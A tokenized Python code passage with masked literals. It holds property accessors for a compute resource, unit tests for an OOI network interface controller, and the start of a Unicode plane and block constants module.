] . value = value <EOL> @ property <EOL> def cores ( self ) : <EOL> return self . attributes [ "<STR_LIT>" ] . value <EOL> @ cores . setter <EOL> def cores ( self , value ) : <EOL> self . attributes [ "<STR_LIT>" ] . value = value <EOL> @ property <EOL> def hostname ( self ) : <EOL> return self . attributes [ "<STR_LIT>" ] . value <EOL> @ hostname . setter <EOL> def hostname ( self , value ) : <EOL> self . attributes [ "<STR_LIT>" ] . value = value <EOL> @ property <EOL> def speed ( self ) : <EOL> return self . attributes [ "<STR_LIT>" ] . value <EOL> @ speed . setter <EOL> def speed ( self , value ) : <EOL> self . attributes [ "<STR_LIT>" ] . value = value <EOL> @ property <EOL> def memory ( self ) : <EOL> return self . attributes [ "<STR_LIT>" ] . value <EOL> @ memory . setter <EOL> def memory ( self , value ) : <EOL> self . attributes [ "<STR_LIT>" ] . value = value <EOL> @ property <EOL> def state ( self ) : <EOL> return self . attributes [ "<STR_LIT>" ] . value </s>
<s> import copy <EOL> import uuid <EOL> from ooi . tests import fakes <EOL> from ooi . tests . middleware import test_middleware <EOL> from ooi import utils <EOL> class TestNetInterfaceController ( test_middleware . TestMiddleware ) : <EOL> """<STR_LIT>""" <EOL> def test_list_ifaces_empty ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:bar>" ] <EOL> app = self . get_app ( ) <EOL> for url in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> req = self . _build_req ( url , tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:GET>" ) <EOL> req . environ [ "<STR_LIT>" ] = tenant [ "<STR_LIT:id>" ] <EOL> resp = req . get_response ( app ) <EOL> expected_result = "<STR_LIT>" <EOL> self . assertContentType ( resp ) <EOL> self . assertExpectedResult ( expected_result , resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_list_ifaces ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT>" ] <EOL> app = self . get_app ( ) <EOL> for url in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> req = self . _build_req ( url , tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:GET>" ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> expected = [ ] <EOL> for ip in fakes . floating_ips [ tenant [ "<STR_LIT:id>" ] ] : <EOL> if ip [ "<STR_LIT>" ] is not None : <EOL> link_id = '<STR_LIT:_>' . join ( [ ip [ "<STR_LIT>" ] , ip [ "<STR_LIT>" ] ] ) <EOL> expected . append ( <EOL> ( "<STR_LIT>" , <EOL> utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % link_id ) ) <EOL> ) <EOL> self . assertExpectedResult ( expected , resp ) <EOL> def test_show_iface ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT>" ] <EOL> app = self . get_app ( ) <EOL> for ip in fakes . floating_ips [ tenant [ "<STR_LIT:id>" ] ] : <EOL> if ip [ "<STR_LIT>" ] is not None : <EOL> link_id = '<STR_LIT:_>' . join ( [ ip [ "<STR_LIT>" ] , ip [ "<STR_LIT>" ] ] ) <EOL> req = self . _build_req ( "<STR_LIT>" % link_id , <EOL> tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:GET>" ) <EOL> resp = req . get_response ( app ) <EOL> self . assertContentType ( resp ) <EOL> source = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % ip [ "<STR_LIT>" ] ) <EOL> target = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" ) <EOL> self . assertResultIncludesLinkAttr ( link_id , source , target , <EOL> resp ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> def test_show_invalid_id ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> app = self . get_app ( ) <EOL> req = self . _build_req ( "<STR_LIT>" % uuid . uuid4 ( ) . hex , <EOL> tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:GET>" ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_show_non_existant_compute ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> app = self . get_app ( ) <EOL> req = self . _build_req ( "<STR_LIT>" % uuid . uuid4 ( ) . hex , <EOL> tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:GET>" ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_show_non_existant_network ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> server_id = fakes . servers [ tenant [ "<STR_LIT:id>" ] ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> app = self . get_app ( ) <EOL> req = self . _build_req ( "<STR_LIT>" % server_id , <EOL> tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:GET>" ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_create_link_invalid_compute ( self ) : <EOL> app = self . get_app ( ) <EOL> net_id = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" ) <EOL> headers = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % net_id <EOL> } <EOL> req = self . _build_req ( "<STR_LIT>" , None , method = "<STR_LIT:POST>" , <EOL> headers = headers ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_create_link_invalid_network ( self ) : <EOL> app = self . get_app ( ) <EOL> server_id = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" ) <EOL> headers = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % server_id <EOL> } <EOL> req = self . _build_req ( "<STR_LIT>" , None , method = "<STR_LIT:POST>" , <EOL> headers = headers ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_create_link_with_fixed ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> server_id = fakes . servers [ tenant [ "<STR_LIT:id>" ] ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> server_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % server_id ) <EOL> net_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , "<STR_LIT>" ) <EOL> app = self . get_app ( ) <EOL> headers = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( server_url , net_url ) <EOL> } <EOL> req = self . _build_req ( "<STR_LIT>" , tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:POST>" , <EOL> headers = headers ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_create_link_with_unexistant_net ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> server_id = fakes . servers [ tenant [ "<STR_LIT:id>" ] ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> server_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % server_id ) <EOL> net_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" ) <EOL> app = self . get_app ( ) <EOL> headers = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( server_url , net_url ) <EOL> } <EOL> req = self . _build_req ( "<STR_LIT>" , tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:POST>" , <EOL> headers = headers ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_create_link_no_pool ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> server_id = fakes . servers [ tenant [ "<STR_LIT:id>" ] ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> server_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % server_id ) <EOL> net_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" ) <EOL> app = self . get_app ( ) <EOL> headers = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( server_url , net_url ) <EOL> } <EOL> req = self . _build_req ( "<STR_LIT>" , tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:POST>" , <EOL> headers = headers ) <EOL> resp = req . get_response ( app ) <EOL> link_id = '<STR_LIT:_>' . join ( [ server_id , fakes . allocated_ip ] ) <EOL> expected = [ ( "<STR_LIT>" , <EOL> utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % link_id ) ) ] <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> self . assertExpectedResult ( expected , resp ) <EOL> self . assertDefaults ( resp ) <EOL> def test_create_link_with_pool ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> server_id = fakes . servers [ tenant [ "<STR_LIT:id>" ] ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> server_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % server_id ) <EOL> net_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" ) <EOL> pool_name = fakes . pools [ tenant [ "<STR_LIT:id>" ] ] [ <NUM_LIT:0> ] [ "<STR_LIT:name>" ] <EOL> app = self . get_app ( ) <EOL> headers = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % pool_name , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( server_url , net_url ) <EOL> } <EOL> req = self . _build_req ( "<STR_LIT>" , tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:POST>" , <EOL> headers = headers ) <EOL> resp = req . get_response ( app ) <EOL> link_id = '<STR_LIT:_>' . join ( [ server_id , fakes . allocated_ip ] ) <EOL> expected = [ ( "<STR_LIT>" , <EOL> utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % link_id ) ) ] <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status_code ) <EOL> self . assertExpectedResult ( expected , resp ) <EOL> self . assertDefaults ( resp ) <EOL> def test_create_link_invalid_pool ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT:foo>" ] <EOL> server_id = fakes . servers [ tenant [ "<STR_LIT:id>" ] ] [ <NUM_LIT:0> ] [ "<STR_LIT:id>" ] <EOL> server_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" % server_id ) <EOL> net_url = utils . join_url ( self . application_url + "<STR_LIT:/>" , <EOL> "<STR_LIT>" ) <EOL> app = self . get_app ( ) <EOL> headers = { <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( server_url , net_url ) <EOL> } <EOL> req = self . _build_req ( "<STR_LIT>" , tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT:POST>" , <EOL> headers = headers ) <EOL> resp = req . get_response ( app ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_delete_fixed ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT>" ] <EOL> app = self . get_app ( ) <EOL> for s in fakes . servers [ tenant [ "<STR_LIT:id>" ] ] : <EOL> addresses = copy . copy ( s . get ( "<STR_LIT>" , { } ) ) <EOL> while addresses : <EOL> addr_set = addresses . popitem ( ) <EOL> for addr in addr_set [ <NUM_LIT:1> ] : <EOL> if addr [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> link_id = '<STR_LIT:_>' . join ( [ s [ "<STR_LIT:id>" ] , addr [ "<STR_LIT>" ] ] ) <EOL> req = self . _build_req ( "<STR_LIT>" % link_id , <EOL> tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT>" ) <EOL> resp = req . get_response ( app ) <EOL> self . assertContentType ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> def test_delete_link ( self ) : <EOL> tenant = fakes . tenants [ "<STR_LIT>" ] <EOL> app = self . get_app ( ) <EOL> for s in fakes . servers [ tenant [ "<STR_LIT:id>" ] ] : <EOL> addresses = copy . copy ( s . get ( "<STR_LIT>" , { } ) ) <EOL> while addresses : <EOL> addr_set = addresses . popitem ( ) <EOL> for addr in addr_set [ <NUM_LIT:1> ] : <EOL> if addr [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> link_id = '<STR_LIT:_>' . join ( [ s [ "<STR_LIT:id>" ] , addr [ "<STR_LIT>" ] ] ) <EOL> req = self . _build_req ( "<STR_LIT>" % link_id , <EOL> tenant [ "<STR_LIT:id>" ] , method = "<STR_LIT>" ) <EOL> resp = req . get_response ( app ) <EOL> self . assertContentType ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status_code ) <EOL> class NetInterfaceControllerTextPlain ( test_middleware . TestMiddlewareTextPlain , <EOL> TestNetInterfaceController ) : <EOL> """<STR_LIT>""" <EOL> class NetInterfaceControllerTextOcci ( test_middleware . TestMiddlewareTextOcci , <EOL> TestNetInterfaceController ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> import six <EOL> import unicodedata <EOL> UNICODE_STARTING_CODEPOINT = <NUM_LIT> <EOL> UNICODE_ENDING_CODEPOINT = <NUM_LIT> <EOL> UNICODE_BLOCKS = None <EOL> UNICODE_PLANES = None <EOL> class PLANE_NAMES ( object ) : <EOL> """<STR_LIT>""" <EOL> basic_multilingual_plane = '<STR_LIT>' <EOL> supplementary_multilingual_plane = '<STR_LIT>' <EOL> supplementary_ideographic_plane = '<STR_LIT>' <EOL> unassigned = '<STR_LIT>' <EOL> supplementary_special_purpose_plane = '<STR_LIT>' <EOL> supplementary_private_use_area = '<STR_LIT>' <EOL> class BLOCK_NAMES ( object ) : <EOL> """<STR_LIT>""" <EOL> basic_latin = "<STR_LIT>" <EOL> c1_controls_and_latin_1_supplement = "<STR_LIT>" <EOL> latin_extended_a = "<STR_LIT>" <EOL> latin_extended_b = "<STR_LIT>" <EOL> ipa_extensions = "<STR_LIT>" <EOL> spacing_modifier_letters = "<STR_LIT>" <EOL> combining_diacritical_marks = "<STR_LIT>" <EOL> greek_coptic = "<STR_LIT>" <EOL> cyrillic = "<STR_LIT>" <EOL> cyrillic_supplement = "<STR_LIT>" <EOL> armenian = "<STR_LIT>" <EOL> hebrew = "<STR_LIT>" <EOL> arabic = "<STR_LIT>" <EOL> syriac = "<STR_LIT>" <EOL> undefined = "<STR_LIT>" <EOL> thaana = "<STR_LIT>" <EOL> devanagari = "<STR_LIT>" <EOL> bengali_assamese = "<STR_LIT>" <EOL> gurmukhi = "<STR_LIT>" <EOL> gujarati = "<STR_LIT>" <EOL> oriya = "<STR_LIT>" <EOL> tamil = "<STR_LIT>" <EOL> telugu = "<STR_LIT>" <EOL> kannada = "<STR_LIT>" <EOL> malayalam = "<STR_LIT>" <EOL> sinhala = "<STR_LIT>" <EOL> thai = "<STR_LIT>" <EOL> lao = "<STR_LIT>" <EOL> tibetan = "<STR_LIT>" <EOL> myanmar = "<STR_LIT>" <EOL> georgian = "<STR_LIT>" <EOL> hangul_jamo = "<STR_LIT>" <EOL> ethiopic = "<STR_LIT>" <EOL> cherokee = "<STR_LIT>" <EOL> unified_canadian_aboriginal_syllabics = ( <EOL> "<STR_LIT>" ) <EOL> ogham = "<STR_LIT>" <EOL> runic = "<STR_LIT>" <EOL> tagalog = "<STR_LIT>" <EOL> hanunoo = "<STR_LIT>" <EOL> buhid = "<STR_LIT>" <EOL> tagbanwa = "<STR_LIT>" <EOL> khmer = "<STR_LIT>" <EOL> mongolian = "<STR_LIT>" <EOL> limbu = "<STR_LIT>" <EOL> tai_le = "<STR_LIT>" <EOL> khmer_symbols = "<STR_LIT>" <EOL> phonetic_extensions = "<STR_LIT>" <EOL> latin_extended_additional = "<STR_LIT>" <EOL> greek_extended = "<STR_LIT>" <EOL> general_punctuation = "<STR_LIT>" <EOL> superscripts_and_subscripts = "<STR_LIT>" <EOL> currency_symbols = "<STR_LIT>" <EOL> combining_diacritical_marks_for_symbols = ( <EOL> "<STR_LIT>" ) <EOL> letterlike_symbols = "<STR_LIT>" <EOL> number_forms = "<STR_LIT>" <EOL> arrows = "<STR_LIT>" <EOL> mathematical_operators = "<STR_LIT>" <EOL> miscellaneous_technical = "<STR_LIT>" <EOL> control_pictures = "<STR_LIT>" <EOL> optical_character_recognition = "<STR_LIT>" <EOL> enclosed_alphanumerics = "<STR_LIT>" <EOL> box_drawing = "<STR_LIT>" <EOL> block_elements = "<STR_LIT>" <EOL> geometric_shapes = "<STR_LIT>" <EOL> miscellaneous_symbols = "<STR_LIT>" <EOL> dingbats = "<STR_LIT>" <EOL> miscellaneous_mathematical_symbols_a = ( <EOL> "<STR_LIT>" ) <EOL> supplemental_arrows_a = "<STR_LIT>" <EOL> braille_patterns = "<STR_LIT>" <EOL> supplemental_arrows_b = "<STR_LIT>" <EOL> miscellaneous_mathematical_symbols_b = ( <EOL> "<STR_LIT>" ) <EOL> supplemental_mathematical_operators = "<STR_LIT>" <EOL> miscellaneous_symbols_and_arrows = "<STR_LIT>" <EOL> cjk_radicals_supplement = "<STR_LIT>" <EOL> kangxi_radicals = "<STR_LIT>" <EOL> ideographic_description_characters = "<STR_LIT>" <EOL> cjk_symbols_and_punctuation = "<STR_LIT>" <EOL> hiragana = "<STR_LIT>" <EOL> katakana = "<STR_LIT>" <EOL> bopomofo = "<STR_LIT>" <EOL> hangul_compatibility_jamo = "<STR_LIT>" <EOL> kanbun_kunten = "<STR_LIT>" <EOL> bopomofo_extended = "<STR_LIT>" <EOL> katakana_phonetic_extensions = "<STR_LIT>" <EOL> enclosed_cjk_letters_and_months = "<STR_LIT>" <EOL> cjk_compatibility = "<STR_LIT>" <EOL> cjk_unified_ideographs_extension_a = "<STR_LIT>" <EOL> yijing_hexagram_symbols = "<STR_LIT>" <EOL> cjk_unified_ideographs = "<STR_LIT>" <EOL> yi_syllables = "<STR_LIT>" <EOL> yi_radicals = "<STR_LIT>" <EOL> hangul_syllables = "<STR_LIT>" <EOL> high_surrogate_area = "<STR_LIT>" <EOL> low_surrogate_area = "<STR_LIT>" <EOL> private_use_area = "<STR_LIT>" <EOL> cjk_compatibility_ideographs = "<STR_LIT>" <EOL> alphabetic_presentation_forms = "<STR_LIT>" <EOL> arabic_presentation_forms_a = "<STR_LIT>" <EOL> variation_selectors = "<STR_LIT>" <EOL> combining_half_marks = "<STR_LIT>" <EOL> cjk_compatibility_forms = "<STR_LIT>" <EOL> small_form_variants = "<STR_LIT>" <EOL> arabic_presentation_forms_b = "<STR_LIT>" <EOL> halfwidth_and_fullwidth_forms = "<STR_LIT>" <EOL> specials = "<STR_LIT>" <EOL> linear_b_syllabary = "<STR_LIT>" <EOL> linear_b_ideograms = "<STR_LIT>" <EOL> aegean_numbers = "<STR_LIT>" <EOL> old_italic = "<STR_LIT>" <EOL> gothic = "<STR_LIT>" <EOL> ugaritic = "<STR_LIT>" <EOL> deseret = "<STR_LIT>" <EOL> shavian = "<STR_LIT>" <EOL> osmanya = "<STR_LIT>" <EOL> cypriot_syllabary = "<STR_LIT>" <EOL> byzantine_musical_symbols = "<STR_LIT>" <EOL> musical_symbols = "<STR_LIT>" <EOL> tai_xuan_jing_symbols = "<STR_LIT>" <EOL> mathematical_alphanumeric_symbols = "<STR_LIT>" <EOL> cjk_unified_ideographs_extension_b = "<STR_LIT>" <EOL> cjk_compatibility_ideographs_supplement = ( <EOL> "<STR_LIT>" ) <EOL> unused = "<STR_LIT>" <EOL> tags = "<STR_LIT>" <EOL> variation_selectors_supplement = "<STR_LIT>" <EOL> supplementary_private_use_area_a = "<STR_LIT>" <EOL> supplementary_private_use_area_b = "<STR_LIT>" <EOL> _unicode_planes = ( <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . basic_multilingual_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_multilingual_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_ideographic_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . unassigned ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_special_purpose_plane ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , PLANE_NAMES . supplementary_private_use_area ) ) <EOL> _unicode_blocks = ( <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . basic_latin ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . c1_controls_and_latin_1_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . latin_extended_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . latin_extended_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ipa_extensions ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . spacing_modifier_letters ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . combining_diacritical_marks ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . greek_coptic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cyrillic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cyrillic_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . armenian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hebrew ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arabic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . syriac ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . thaana ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . devanagari ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . bengali_assamese ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . gurmukhi ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . gujarati ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . oriya ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tamil ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . telugu ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . kannada ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . malayalam ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . sinhala ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . thai ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . lao ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tibetan ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . myanmar ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . georgian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hangul_jamo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ethiopic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cherokee ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <EOL> BLOCK_NAMES . unified_canadian_aboriginal_syllabics ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . ogham ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . runic ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tagalog ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . hanunoo ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . buhid ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tagbanwa ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . khmer ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . mongolian ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . limbu ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . tai_le ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . khmer_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . phonetic_extensions ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . latin_extended_additional ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . greek_extended ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . general_punctuation ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . superscripts_and_subscripts ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . currency_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <EOL> BLOCK_NAMES . combining_diacritical_marks_for_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . letterlike_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . number_forms ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . arrows ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . mathematical_operators ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_technical ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . control_pictures ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . optical_character_recognition ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . enclosed_alphanumerics ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . box_drawing ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . block_elements ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . geometric_shapes ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_symbols ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . dingbats ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_mathematical_symbols_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplemental_arrows_a ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . braille_patterns ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplemental_arrows_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_mathematical_symbols_b ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . supplemental_mathematical_operators ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . miscellaneous_symbols_and_arrows ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . cjk_radicals_supplement ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . kangxi_radicals ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , BLOCK_NAMES . undefined ) , <EOL> ( 